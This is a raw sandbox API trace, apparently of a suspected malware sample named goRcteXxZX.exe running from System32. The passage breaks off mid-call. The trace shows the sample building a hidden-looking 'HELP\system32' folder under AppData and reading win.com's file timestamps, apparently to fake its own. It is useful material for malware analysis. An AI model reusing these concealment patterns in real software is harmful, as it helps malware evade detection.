\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0034.533] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x1ef41c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿï<\x82ôT÷\x1e", lpUsedDefaultChar=0x0) returned 256 [0034.533] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.533] GetLastError () returned 0x0 [0034.533] SetLastError (dwErrCode=0x0) [0034.533] GetLastError () returned 0x0 [0034.533] SetLastError (dwErrCode=0x0) [0034.533] GetLastError () returned 0x0 [0034.533] SetLastError (dwErrCode=0x0) [0034.533] GetLastError () returned 0x0 [0034.533] SetLastError (dwErrCode=0x0) [0034.533] GetLastError () returned 0x0 [0034.533] SetLastError (dwErrCode=0x0) [0034.533] GetLastError () returned 0x0 [0034.533] SetLastError (dwErrCode=0x0) [0034.533] GetLastError () returned 0x0 [0034.533] SetLastError (dwErrCode=0x0) [0034.533] GetLastError () returned 0x0 [0034.533] SetLastError (dwErrCode=0x0) [0034.533] GetLastError () returned 0x0 [0034.533] SetLastError (dwErrCode=0x0) [0034.533] GetLastError () returned 0x0 [0034.533] SetLastError (dwErrCode=0x0) [0034.533] GetLastError () returned 0x0 [0034.534] SetLastError (dwErrCode=0x0) [0034.534] GetLastError () returned 0x0 [0034.534] SetLastError (dwErrCode=0x0) [0034.534] GetLastError () returned 0x0 [0034.534] SetLastError (dwErrCode=0x0) [0034.534] GetLastError () returned 0x0 [0034.534] SetLastError (dwErrCode=0x0) [0034.534] GetLastError () returned 0x0 [0034.534] SetLastError (dwErrCode=0x0) [0034.534] GetLastError () returned 0x0 [0034.534] SetLastError (dwErrCode=0x0) [0034.534] GetLastError () returned 0x0 [0034.534] SetLastError (dwErrCode=0x0) [0034.534] GetLastError () returned 0x0 [0034.534] SetLastError (dwErrCode=0x0) [0034.534] GetLastError () returned 0x0 [0034.534] SetLastError (dwErrCode=0x0) [0034.534] GetLastError () returned 0x0 [0034.534] SetLastError (dwErrCode=0x0) [0034.534] GetLastError () returned 0x0 [0034.534] SetLastError (dwErrCode=0x0) [0034.534] GetLastError () returned 0x0 [0034.534] SetLastError (dwErrCode=0x0) [0034.534] GetLastError () returned 0x0 [0034.534] SetLastError (dwErrCode=0x0) [0034.534] GetLastError () returned 0x0 [0034.534] SetLastError (dwErrCode=0x0) [0034.534] GetLastError () returned 0x0 [0034.534] SetLastError (dwErrCode=0x0) [0034.534] GetLastError () returned 0x0 [0034.535] SetLastError (dwErrCode=0x0) [0034.535] GetLastError () returned 0x0 [0034.535] SetLastError (dwErrCode=0x0) [0034.535] GetLastError () returned 0x0 [0034.535] SetLastError (dwErrCode=0x0) [0034.535] GetLastError () returned 0x0 [0034.535] SetLastError (dwErrCode=0x0) [0034.535] GetLastError () returned 0x0 [0034.535] SetLastError (dwErrCode=0x0) [0034.535] GetLastError () returned 0x0 [0034.535] SetLastError (dwErrCode=0x0) [0034.535] GetLastError () returned 0x0 [0034.535] SetLastError (dwErrCode=0x0) [0034.535] GetLastError () returned 0x0 [0034.535] SetLastError (dwErrCode=0x0) [0034.535] GetLastError () returned 0x0 [0034.535] SetLastError (dwErrCode=0x0) [0034.535] GetLastError () returned 0x0 [0034.535] SetLastError (dwErrCode=0x0) [0034.535] GetLastError () returned 0x0 [0034.535] SetLastError (dwErrCode=0x0) [0034.535] GetLastError () returned 0x0 [0034.535] SetLastError (dwErrCode=0x0) [0034.535] GetLastError () returned 0x0 [0034.535] SetLastError (dwErrCode=0x0) [0034.535] GetLastError () returned 0x0 [0034.535] SetLastError (dwErrCode=0x0) [0034.535] GetLastError () returned 0x0 [0034.536] SetLastError (dwErrCode=0x0) [0034.536] GetLastError () returned 0x0 [0034.536] SetLastError (dwErrCode=0x0) [0034.536] GetLastError () returned 0x0 [0034.536] SetLastError (dwErrCode=0x0) [0034.536] GetLastError () returned 0x0 [0034.536] SetLastError (dwErrCode=0x0) [0034.536] GetLastError () returned 0x0 [0034.536] SetLastError (dwErrCode=0x0) [0034.536] GetLastError () returned 0x0 [0034.536] SetLastError (dwErrCode=0x0) [0034.536] GetLastError () returned 0x0 [0034.536] SetLastError (dwErrCode=0x0) [0034.536] GetLastError () returned 0x0 [0034.536] SetLastError (dwErrCode=0x0) [0034.536] GetLastError () returned 0x0 [0034.536] SetLastError (dwErrCode=0x0) [0034.536] GetLastError () returned 0x0 [0034.536] SetLastError (dwErrCode=0x0) [0034.536] GetLastError () returned 0x0 [0034.536] SetLastError (dwErrCode=0x0) [0034.536] GetLastError () returned 0x0 [0034.536] SetLastError (dwErrCode=0x0) [0034.536] GetLastError () returned 0x0 [0034.536] SetLastError (dwErrCode=0x0) [0034.536] GetLastError () returned 0x0 [0034.536] SetLastError (dwErrCode=0x0) [0034.536] GetLastError () returned 0x0 [0034.536] SetLastError (dwErrCode=0x0) [0034.536] GetLastError () returned 0x0 [0034.537] SetLastError (dwErrCode=0x0) [0034.537] GetLastError () returned 0x0 [0034.537] SetLastError (dwErrCode=0x0) [0034.537] GetLastError () returned 0x0 [0034.537] SetLastError (dwErrCode=0x0) [0034.537] GetLastError () returned 0x0 [0034.537] SetLastError (dwErrCode=0x0) [0034.537] GetLastError () returned 0x0 [0034.537] SetLastError (dwErrCode=0x0) [0034.537] GetLastError () returned 0x0 [0034.537] SetLastError (dwErrCode=0x0) [0034.537] GetLastError () returned 0x0 [0034.537] SetLastError (dwErrCode=0x0) [0034.537] GetLastError () returned 0x0 [0034.537] SetLastError (dwErrCode=0x0) [0034.537] GetLastError () returned 0x0 [0034.537] SetLastError (dwErrCode=0x0) [0034.537] GetLastError () returned 0x0 [0034.537] SetLastError (dwErrCode=0x0) [0034.537] GetLastError () returned 0x0 [0034.537] SetLastError (dwErrCode=0x0) [0034.537] GetLastError () returned 0x0 [0034.546] SetLastError (dwErrCode=0x0) [0034.546] GetLastError () returned 0x0 [0034.546] SetLastError (dwErrCode=0x0) [0034.546] GetLastError () returned 0x0 [0034.546] SetLastError (dwErrCode=0x0) [0034.546] GetLastError () returned 0x0 [0034.546] SetLastError (dwErrCode=0x0) [0034.546] GetLastError () returned 0x0 [0034.546] SetLastError (dwErrCode=0x0) [0034.546] GetLastError () returned 0x0 [0034.546] SetLastError (dwErrCode=0x0) [0034.546] GetLastError () returned 0x0 [0034.546] SetLastError (dwErrCode=0x0) [0034.546] GetLastError () returned 0x0 [0034.546] SetLastError (dwErrCode=0x0) [0034.546] GetLastError () returned 0x0 [0034.546] SetLastError (dwErrCode=0x0) [0034.546] GetLastError () returned 0x0 [0034.546] SetLastError (dwErrCode=0x0) [0034.546] GetLastError () returned 0x0 [0034.546] SetLastError (dwErrCode=0x0) [0034.546] GetLastError () returned 0x0 [0034.546] SetLastError (dwErrCode=0x0) [0034.546] GetLastError () returned 0x0 [0034.546] SetLastError (dwErrCode=0x0) [0034.546] GetLastError () returned 0x0 [0034.546] SetLastError (dwErrCode=0x0) [0034.546] GetLastError () returned 0x0 [0034.546] SetLastError (dwErrCode=0x0) [0034.546] GetLastError () returned 0x0 [0034.546] SetLastError (dwErrCode=0x0) [0034.546] GetLastError () returned 0x0 [0034.546] SetLastError (dwErrCode=0x0) [0034.547] GetLastError () returned 0x0 [0034.547] SetLastError (dwErrCode=0x0) [0034.547] GetLastError () returned 0x0 [0034.547] SetLastError (dwErrCode=0x0) [0034.547] GetLastError () returned 0x0 [0034.547] SetLastError (dwErrCode=0x0) [0034.547] GetLastError () returned 0x0 [0034.547] SetLastError (dwErrCode=0x0) [0034.547] GetLastError () returned 0x0 [0034.547] SetLastError (dwErrCode=0x0) [0034.547] GetLastError () returned 0x0 [0034.547] SetLastError (dwErrCode=0x0) [0034.547] GetLastError () returned 0x0 [0034.547] SetLastError (dwErrCode=0x0) [0034.547] GetLastError () returned 0x0 [0034.547] SetLastError (dwErrCode=0x0) [0034.547] GetLastError () returned 0x0 [0034.547] SetLastError (dwErrCode=0x0) [0034.547] GetLastError () returned 0x0 [0034.547] SetLastError (dwErrCode=0x0) [0034.547] GetLastError () returned 0x0 [0034.547] SetLastError (dwErrCode=0x0) [0034.547] GetLastError () returned 0x0 [0034.547] SetLastError (dwErrCode=0x0) [0034.547] GetLastError () returned 0x0 [0034.547] SetLastError (dwErrCode=0x0) [0034.547] GetLastError () returned 0x0 [0034.547] SetLastError (dwErrCode=0x0) [0034.547] GetLastError () returned 0x0 [0034.547] SetLastError (dwErrCode=0x0) [0034.547] GetLastError () returned 0x0 [0034.547] SetLastError (dwErrCode=0x0) [0034.547] GetLastError () returned 0x0 [0034.547] SetLastError (dwErrCode=0x0) [0034.547] GetLastError () returned 0x0 [0034.548] SetLastError (dwErrCode=0x0) [0034.548] GetLastError () returned 0x0 [0034.548] SetLastError (dwErrCode=0x0) [0034.548] GetLastError () returned 0x0 [0034.548] SetLastError (dwErrCode=0x0) [0034.548] GetLastError () returned 0x0 [0034.548] SetLastError (dwErrCode=0x0) [0034.548] GetLastError () returned 0x0 [0034.548] SetLastError (dwErrCode=0x0) [0034.548] GetLastError () returned 0x0 [0034.548] SetLastError (dwErrCode=0x0) [0034.548] GetLastError () returned 0x0 [0034.548] SetLastError (dwErrCode=0x0) [0034.548] GetLastError () returned 0x0 [0034.548] SetLastError (dwErrCode=0x0) [0034.548] GetLastError () returned 0x0 [0034.548] SetLastError (dwErrCode=0x0) [0034.548] GetLastError () returned 0x0 [0034.548] SetLastError (dwErrCode=0x0) [0034.548] GetLastError () returned 0x0 [0034.548] SetLastError (dwErrCode=0x0) [0034.548] GetLastError () returned 0x0 [0034.548] SetLastError (dwErrCode=0x0) [0034.548] GetLastError () returned 0x0 [0034.548] SetLastError (dwErrCode=0x0) [0034.548] GetLastError () returned 0x0 [0034.548] SetLastError (dwErrCode=0x0) [0034.548] GetLastError () returned 0x0 [0034.548] SetLastError (dwErrCode=0x0) [0034.548] GetLastError () returned 0x0 [0034.548] SetLastError (dwErrCode=0x0) [0034.548] GetLastError () returned 0x0 [0034.548] SetLastError (dwErrCode=0x0) [0034.548] GetLastError () returned 0x0 [0034.549] SetLastError (dwErrCode=0x0) [0034.549] GetLastError () returned 0x0 [0034.549] SetLastError (dwErrCode=0x0) [0034.549] GetLastError () returned 0x0 [0034.549] SetLastError (dwErrCode=0x0) [0034.549] GetLastError () returned 0x0 [0034.549] SetLastError (dwErrCode=0x0) [0034.549] GetLastError () returned 0x0 [0034.549] SetLastError (dwErrCode=0x0) [0034.549] GetLastError () returned 0x0 [0034.549] SetLastError (dwErrCode=0x0) [0034.549] GetLastError () returned 0x0 [0034.549] SetLastError (dwErrCode=0x0) [0034.549] GetLastError () returned 0x0 [0034.549] SetLastError (dwErrCode=0x0) [0034.549] GetLastError () returned 0x0 [0034.549] SetLastError (dwErrCode=0x0) [0034.549] GetLastError () returned 0x0 [0034.549] SetLastError (dwErrCode=0x0) [0034.549] GetLastError () returned 0x0 [0034.549] SetLastError (dwErrCode=0x0) [0034.549] GetLastError () returned 0x0 [0034.549] SetLastError (dwErrCode=0x0) [0034.549] GetLastError () returned 0x0 [0034.549] SetLastError (dwErrCode=0x0) [0034.549] GetLastError () returned 0x0 [0034.549] SetLastError (dwErrCode=0x0) [0034.549] GetLastError () returned 0x0 [0034.549] SetLastError (dwErrCode=0x0) [0034.549] GetLastError () returned 0x0 [0034.549] SetLastError (dwErrCode=0x0) [0034.549] GetLastError () returned 0x0 [0034.550] SetLastError (dwErrCode=0x0) [0034.550] GetLastError () returned 0x0 [0034.550] SetLastError (dwErrCode=0x0) [0034.550] GetLastError () returned 0x0 [0034.550] SetLastError (dwErrCode=0x0) [0034.550] GetLastError () returned 0x0 [0034.550] SetLastError (dwErrCode=0x0) [0034.550] GetLastError () returned 0x0 [0034.550] SetLastError (dwErrCode=0x0) [0034.550] GetLastError () returned 0x0 [0034.550] SetLastError (dwErrCode=0x0) [0034.550] GetLastError () returned 0x0 [0034.550] SetLastError (dwErrCode=0x0) [0034.550] GetLastError () returned 0x0 [0034.550] SetLastError (dwErrCode=0x0) [0034.550] GetLastError () returned 0x0 [0034.550] SetLastError (dwErrCode=0x0) [0034.550] GetLastError () returned 0x0 [0034.550] SetLastError (dwErrCode=0x0) [0034.550] GetLastError () returned 0x0 [0034.550] SetLastError (dwErrCode=0x0) [0034.550] GetLastError () returned 0x0 [0034.550] SetLastError (dwErrCode=0x0) [0034.550] GetLastError () returned 0x0 [0034.550] SetLastError (dwErrCode=0x0) [0034.550] GetLastError () returned 0x0 [0034.550] SetLastError (dwErrCode=0x0) [0034.550] GetLastError () returned 0x0 [0034.550] SetLastError (dwErrCode=0x0) [0034.550] GetLastError () returned 0x0 [0034.550] SetLastError (dwErrCode=0x0) [0034.550] GetLastError () returned 0x0 [0034.550] SetLastError (dwErrCode=0x0) [0034.550] GetLastError () returned 0x0 [0034.551] SetLastError (dwErrCode=0x0) [0034.551] GetLastError () returned 0x0 [0034.551] SetLastError (dwErrCode=0x0) [0034.551] GetLastError () returned 0x0 [0034.551] SetLastError (dwErrCode=0x0) [0034.551] GetLastError () returned 0x0 [0034.551] SetLastError (dwErrCode=0x0) [0034.551] GetLastError () returned 0x0 [0034.551] SetLastError (dwErrCode=0x0) [0034.551] GetLastError () returned 0x0 [0034.551] SetLastError (dwErrCode=0x0) [0034.551] GetLastError () returned 0x0 [0034.551] SetLastError (dwErrCode=0x0) [0034.551] GetLastError () returned 0x0 [0034.551] SetLastError (dwErrCode=0x0) [0034.551] GetLastError () returned 0x0 [0034.551] SetLastError (dwErrCode=0x0) [0034.551] GetLastError () returned 0x0 [0034.551] SetLastError (dwErrCode=0x0) [0034.551] GetLastError () returned 0x0 [0034.551] SetLastError (dwErrCode=0x0) [0034.551] GetLastError () returned 0x0 [0034.551] SetLastError (dwErrCode=0x0) [0034.551] GetLastError () returned 0x0 [0034.551] SetLastError (dwErrCode=0x0) [0034.551] GetLastError () returned 0x0 [0034.551] SetLastError (dwErrCode=0x0) [0034.551] GetLastError () returned 0x0 [0034.551] SetLastError (dwErrCode=0x0) [0034.551] GetLastError () returned 0x0 [0034.551] SetLastError (dwErrCode=0x0) [0034.551] GetLastError () returned 0x0 [0034.551] SetLastError (dwErrCode=0x0) [0034.551] GetLastError () returned 0x0 [0034.552] SetLastError (dwErrCode=0x0) [0034.552] GetLastError () returned 0x0 [0034.552] SetLastError (dwErrCode=0x0) [0034.552] GetLastError () returned 0x0 [0034.552] SetLastError (dwErrCode=0x0) [0034.552] GetLastError () returned 0x0 [0034.552] SetLastError (dwErrCode=0x0) [0034.552] GetLastError () returned 0x0 [0034.552] SetLastError (dwErrCode=0x0) [0034.552] GetLastError () returned 0x0 [0034.552] SetLastError (dwErrCode=0x0) [0034.552] GetLastError () returned 0x0 [0034.552] SetLastError (dwErrCode=0x0) [0034.552] GetLastError () returned 0x0 [0034.552] SetLastError (dwErrCode=0x0) [0034.552] GetLastError () returned 0x0 [0034.552] SetLastError (dwErrCode=0x0) [0034.552] GetLastError () returned 0x0 [0034.552] SetLastError (dwErrCode=0x0) [0034.552] GetLastError () returned 0x0 [0034.552] SetLastError (dwErrCode=0x0) [0034.552] GetLastError () returned 0x0 [0034.552] SetLastError (dwErrCode=0x0) [0034.552] GetLastError () returned 0x0 [0034.552] SetLastError (dwErrCode=0x0) [0034.552] GetLastError () returned 0x0 [0034.552] SetLastError (dwErrCode=0x0) [0034.552] GetLastError () returned 0x0 [0034.552] SetLastError (dwErrCode=0x0) [0034.552] GetLastError () returned 0x0 [0034.552] SetLastError (dwErrCode=0x0) [0034.552] GetLastError () returned 0x0 [0034.552] SetLastError (dwErrCode=0x0) [0034.552] GetLastError () returned 0x0 [0034.552] SetLastError (dwErrCode=0x0) [0034.553] GetLastError () returned 0x0 [0034.553] SetLastError (dwErrCode=0x0) [0034.553] GetLastError () returned 0x0 [0034.553] SetLastError (dwErrCode=0x0) [0034.553] GetLastError () returned 0x0 [0034.553] SetLastError (dwErrCode=0x0) [0034.553] GetLastError () returned 0x0 [0034.553] SetLastError (dwErrCode=0x0) [0034.553] GetLastError () returned 0x0 [0034.553] SetLastError (dwErrCode=0x0) [0034.553] GetLastError () returned 0x0 [0034.553] SetLastError (dwErrCode=0x0) [0034.553] GetLastError () returned 0x0 [0034.553] SetLastError (dwErrCode=0x0) [0034.553] GetLastError () returned 0x0 [0034.553] SetLastError (dwErrCode=0x0) [0034.553] GetLastError () returned 0x0 [0034.553] SetLastError (dwErrCode=0x0) [0034.553] GetLastError () returned 0x0 [0034.553] SetLastError (dwErrCode=0x0) [0034.553] GetLastError () returned 0x0 [0034.553] SetLastError (dwErrCode=0x0) [0034.553] GetLastError () returned 0x0 [0034.553] SetLastError (dwErrCode=0x0) [0034.553] GetLastError () returned 0x0 [0034.553] SetLastError (dwErrCode=0x0) [0034.554] GetLastError () returned 0x0 [0034.554] SetLastError (dwErrCode=0x0) [0034.554] GetLastError () returned 0x0 [0034.554] SetLastError (dwErrCode=0x0) [0034.554] GetLastError () returned 0x0 [0034.554] SetLastError (dwErrCode=0x0) [0034.554] GetLastError () returned 0x0 [0034.554] SetLastError (dwErrCode=0x0) [0034.554] GetLastError () returned 0x0 [0034.554] SetLastError (dwErrCode=0x0) [0034.554] GetLastError () returned 0x0 [0034.554] SetLastError (dwErrCode=0x0) [0034.554] GetLastError () returned 0x0 [0034.554] SetLastError (dwErrCode=0x0) [0034.554] GetLastError () returned 0x0 [0034.554] SetLastError (dwErrCode=0x0) [0034.554] GetLastError () returned 0x0 [0034.554] SetLastError (dwErrCode=0x0) [0034.554] GetLastError () returned 0x0 [0034.554] SetLastError (dwErrCode=0x0) [0034.554] GetLastError () returned 0x0 [0034.554] SetLastError (dwErrCode=0x0) [0034.554] GetLastError () returned 0x0 [0034.554] SetLastError (dwErrCode=0x0) [0034.554] GetLastError () returned 0x0 [0034.554] SetLastError (dwErrCode=0x0) [0034.554] GetLastError () returned 0x0 [0034.554] SetLastError (dwErrCode=0x0) [0034.554] GetLastError () returned 0x0 [0034.554] SetLastError (dwErrCode=0x0) [0034.554] GetLastError () returned 0x0 [0034.554] SetLastError (dwErrCode=0x0) [0034.554] GetLastError () returned 0x0 [0034.554] SetLastError (dwErrCode=0x0) [0034.554] GetLastError () returned 0x0 [0034.555] SetLastError (dwErrCode=0x0) [0034.555] GetLastError () returned 0x0 [0034.555] SetLastError (dwErrCode=0x0) [0034.555] GetLastError () returned 0x0 [0034.555] SetLastError (dwErrCode=0x0) [0034.555] GetLastError () returned 0x0 [0034.555] SetLastError (dwErrCode=0x0) [0034.555] GetLastError () returned 0x0 [0034.555] SetLastError (dwErrCode=0x0) [0034.555] GetLastError () returned 0x0 [0034.555] SetLastError (dwErrCode=0x0) [0034.555] GetLastError () returned 0x0 [0034.555] SetLastError (dwErrCode=0x0) [0034.555] GetLastError () returned 0x0 [0034.555] SetLastError (dwErrCode=0x0) [0034.555] GetLastError () returned 0x0 [0034.555] SetLastError (dwErrCode=0x0) [0034.555] GetLastError () returned 0x0 [0034.555] SetLastError (dwErrCode=0x0) [0034.555] GetLastError () returned 0x0 [0034.555] SetLastError (dwErrCode=0x0) [0034.555] GetLastError () returned 0x0 [0034.555] SetLastError (dwErrCode=0x0) [0034.555] GetLastError () returned 0x0 [0034.555] SetLastError (dwErrCode=0x0) [0034.555] GetLastError () returned 0x0 [0034.555] SetLastError (dwErrCode=0x0) [0034.555] GetLastError () returned 0x0 [0034.555] SetLastError (dwErrCode=0x0) [0034.555] GetLastError () returned 0x0 [0034.555] SetLastError (dwErrCode=0x0) [0034.556] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0034.556] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0034.556] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0034.557] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1ef798 | out: lpSystemTimeAsFileTime=0x1ef798*(dwLowDateTime=0xe2490e10, dwHighDateTime=0x1d3dfba)) [0034.557] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1ef6d0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.557] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1ef5b8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.557] GetLastError () returned 0x0 [0034.557] GetLastError () returned 0x0 [0034.557] GetLastError () returned 0x0 [0034.557] GetLastError () returned 0x0 [0034.557] GetLastError () returned 0x0 [0034.557] GetLastError () returned 0x0 [0034.557] GetLastError () returned 0x0 [0034.557] GetLastError () returned 0x0 [0034.557] GetLastError () returned 0x0 [0034.557] GetLastError () returned 0x0 [0034.557] GetLastError () returned 0x0 [0034.557] GetLastError () returned 0x0 [0034.557] GetLastError () returned 0x0 [0034.557] GetLastError () returned 0x0 [0034.557] GetLastError () returned 0x0 [0034.557] GetLastError () returned 0x0 [0034.557] GetLastError () returned 0x0 [0034.557] GetLastError () returned 0x0 [0034.557] GetLastError () returned 0x0 [0034.558] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0034.558] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0034.558] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.558] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.558] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.558] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0034.558] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0034.558] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0034.558] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0034.558] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0034.558] GetLastError () returned 0xb7 [0034.558] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0034.558] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0034.558] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0034.558] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0034.558] wsprintfA (in: param_1=0x1ef438, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0034.558] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0034.558] wsprintfA (in: param_1=0x1ef334, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0034.558] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0034.559] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0034.559] CloseHandle (hObject=0x74) returned 1 [0034.559] GetLastError () returned 0x0 [0034.559] wsprintfA (in: 